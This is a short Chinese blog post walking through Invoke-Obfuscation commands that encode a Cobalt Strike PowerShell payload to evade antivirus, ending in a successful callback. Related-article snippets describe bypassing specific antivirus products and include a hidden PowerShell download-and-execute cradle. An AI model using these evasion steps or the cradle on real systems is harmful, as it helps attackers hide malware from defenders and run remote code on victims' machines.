invoke-obfuscation使用遇到的问题及Encoding免杀

最新推荐文章于 2023-11-20 15:52:29 发布
最新推荐文章于 2023-11-20 15:52:29 发布
阅读量2k 收藏
点赞数
文章标签: 系统安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Croil/article/details/122142183
版权

记录-cs的invoke-obfuscation中encoding免杀。

在导入使用时遇到权限问题。

解决方法:以管理员身份运行power shell,输入 get-executionpolicy,显示 Restricted,则不允许执行任何脚本,输入set-executionpolicy remotesigned,选择Y,即可解决。

 

解决了权限问题后,回到继续的步骤,进入Invoke-Obfuscation目录后,在PowerShell中执行命令

Import-Module .\Invoke-Obfuscation.psd1
Invoke-Obfuscation

 成功导入后,设置指定待处理的Ps1文件。

set scriptpath C:\xxx\xxx.ps1

或者可以指定待处理的ps代码。

set scriptblock 'echo xss'

输入encoding 并选择编码方式,这里我选择了1

最后,输入命令,导出免杀ps文件到指定路径

out C:\xxx\xxx.ps1

 

 最后,成功上线

 

 

CHLnG
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
利用Invoke-Obfuscation混淆ps文件实现上线/VT率3/55
AerYinan的博客
01-12 9661
利用Invoke-Obfuscation混淆ps文件实现上线/VT率3/55
Invoke-Obfuscation-Bypass + PS2EXE 绕过主流软1
08-03
在描述中提到,通过将 Invoke-Obfuscation 应用到 C# 生成的 PowerShell 脚本上,然后使用 PS2EXE 工具将其转换为exe文件,可以有效地绕过某些主流软的检测。例如,在测试过程中,混淆后的脚本不再被某60云查和...
Invoke-Obfuscation(psh代码混淆)
不知名白帽的博客
08-11 794
Invoke-Obfuscation(psh代码混淆)
Invoke-Obfuscation混淆过360和火绒
crowsec
06-01 2037
微信公众号:乌鸦安全 扫取二维码获取 目录 1. 模块使用 2. msfvenom下msf上线 2.1 360 2.2 Windows defender 2.3 火绒 2.4 总结 3. 混淆大法 4. 第一种混淆 1 4.1 360 4.2 windows Defender 4.3 火绒 4.4 总结 5. 第2种混淆 2 5.1 火绒 5.2 360 5.3 Windows Defender 5.4 总结 6. 第三种方法 3 6.1 360 6.2 火.
Invoke-Obfuscation
weixin_44216796的博客
01-16 2378
导入项目: Import-Module ./Invoke-Obfuscation.psd1 Invoke-Obfuscation 支持的加密功能列表 TOKEN支持分部分混淆 STRING整条命令混淆 COMPRESS将命令转为单行并压缩, ENCODING编码 LAUNCHER选择执行方式。 使用 set scriptpath C:\Users\Administrator\Desktop\payload.ps1 encoding 1 out x.ps1 powershell -windowsty
Invoke-Obfuscation笔记
mingyqf的博客
05-11 1253
坑点:window11不行,放到虚拟机win10 就行了 步骤: Import-Module ./Invoke-Obfuscation.psd1 Invoke-Obfuscation
invoke-atomicredteam:Invoke-AtomicRedTeam是一个PowerShell模块,用于执行[atomics文件夹](https
04-30
Invoke-AtomicRedTeam是一个PowerShell模块,用于执行Red Canary的Atomic Red Team项目的中定义的测试。 “ atomics文件夹”包含定义的每种技术的文件夹。 在每个“ T#”文件夹中,您都会找到一个yaml文件,该文件...
Invoke-WCMDump-master1.rar
06-10
使用 Invoke-WCMDump 加powershell 获取windows凭证密码 使用文档地址:https://blog.csdn.net/caperxi/article/details/117775522
藏经阁-Revoke-Obfuscation.pdf
09-09
3. Invoke-Obfuscation 和 Invoke-CradleCrafter-Obfuscation:Invoke-Obfuscation 和 Invoke-CradleCrafter-Obfuscation 是两种 PowerShell 混淆技术,旨在规避检测和追踪。这些技术可以生成高度混淆的 PowerShell ...
PowerShell中使用curl(Invoke-WebRequest)的方法教程
01-10
前言 PowerShell能干什么呢?PowerShell首先是个Shell,定义好了一堆命令与操作系统,特别是与文件系统交互,能够启动应用程序,甚至操纵应用程序;第二,PowerShell允许将几个命令组合起来放到文件里执行,实现文件...
Invoke-Obfuscation:一款功能强大的PowerShell代码混淆工具
dzqxwzoe的博客
10-23 156
很多网络攻击者和商业化恶意软件正在使用一些非常基础的代码混淆技术,并尝试从powershell.exe的命令行参数中隐藏大部分命令。因此,Invoke-Obfuscation使用非常简单,因为它支持以可视化的形式来使用和研究针对PowerShell代码和命令的混淆技术。Invoke-Obfuscation是一款功能强大的PowerShell代码混淆工具,该工具兼容PowerShell。v2.0-v5.0语法上可能存在的命令混淆问题,以便提升研究人员和反病毒产品的检测能力。本项目的开发与发布遵循[
渗透测试——漏洞扫描工具
最新发布
wuli1024的博客
11-20 365
然后还要将all这个压缩包里的plugin_feed_info.inc提取出来,命令行是 tar -zxvf all-2.0.tar.gz plugin_feed_info.inc,然鹅,我提取不出来。将下载好的插件移动到Nessus目录下,然后输入sudo /opt/nessus/sbin/nessuscli update all-2.0.tar.gz。用户名和密码随便写写就好,随后将会更新补丁,OK,这样Nessus可以使用了。将会获得一串数字,然后去激活码的这个网站,输入自己的邮箱获取激活码。
利用Invoke-Obfuscation工具进行Powershell恶意脚本
m0_62239233的博客
04-18 754
记录渗透学习中的实验过程。
PowerShell木马利器: Invoke-Obfuscation(过火绒)
xf555er的博客
01-07 2212
Invoke-Obfuscation工具下载地址: https://github.com/danielbohannon/Invoke-ObfuscationInvoke-Obfuscation是一款PowerShell混淆工具,可以将PowerShell脚本加密,使得它的检测和分析变得更加困难。该工具包含多种加密方法,可以单独使用也可以结合使用,以提高混淆的效果。
【渗透测试笔记】之【工具——使用Invoke-Obfuscation代码混淆powershell】
AA8j的博客
07-06 1891
0x01 项目地址 https://github.com/danielbohannon/Invoke-Obfuscation 0x02 用法 生成powershell: powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://x.x.x.x:55556/a'))" 下载并用powershell进入项目目录执行:Import-Module .\Invoke-Obfuscati
Powershell系列(二)
st3pby的博客
02-20 3202
技术交流 关注微信公众号 Z20安全团队 , 回复 加群 ,拉你入群 一起讨论技术。 直接公众号文章复制过来的,排版可能有点乱, 可以去公众号看。 正文 powershell的⽅法有很多,对代码进⾏编码是最常⻅的⼀种,这⾥介绍⼀个专⻔⽤来对powershell进⾏编码的框架Invoke-Obfuscation,这也是著名的APT32组织海莲花常⽤的⼀个⼯具。 该工具可以对powershell代码进行 ASCII/hex/octal/binary/SecureS...
Invoke-Obfuscation混淆ps文件绕过Windows_Defender
tempulcc的博客
09-10 660
前提# powershell只能针对win7之后的系统,之前的win操作系统默认没有安装powershell。 所在目录:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 混淆# 1.Cobaltstrike制作ps1后门文件 2.进入Invoke-Obfuscation Copy Import-Module ./Invoke-Obfuscation.psd1 Invoke-Obfuscation 可能会报错?! win10 x64系统 I
解决VSCODE“因为在此系统上禁止运行脚本“报错
u013994400的博客
11-02 347
找了下原因,是因为PowerShell执行策略的问题 解决方法: 以管理员身份运行vscode; 执行:get-ExecutionPolicy,显示Restricted,表示状态是禁止的; 执行:set-ExecutionPolicy RemoteSigned; 这时再执行get-ExecutionPolicy,就显示RemoteSigned; ...
如何下载Invoke-Obfuscation
04-06
1. 打开GitHub页面:https://github.com/danielbohannon/Invoke-Obfuscation ... 3. 解压缩下载的压缩包。 4. 在解压缩后的文件夹中找到“Invoke-Obfuscation.psd1”文件...6. 下载完成,可以开始使用Invoke-Obfuscation

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值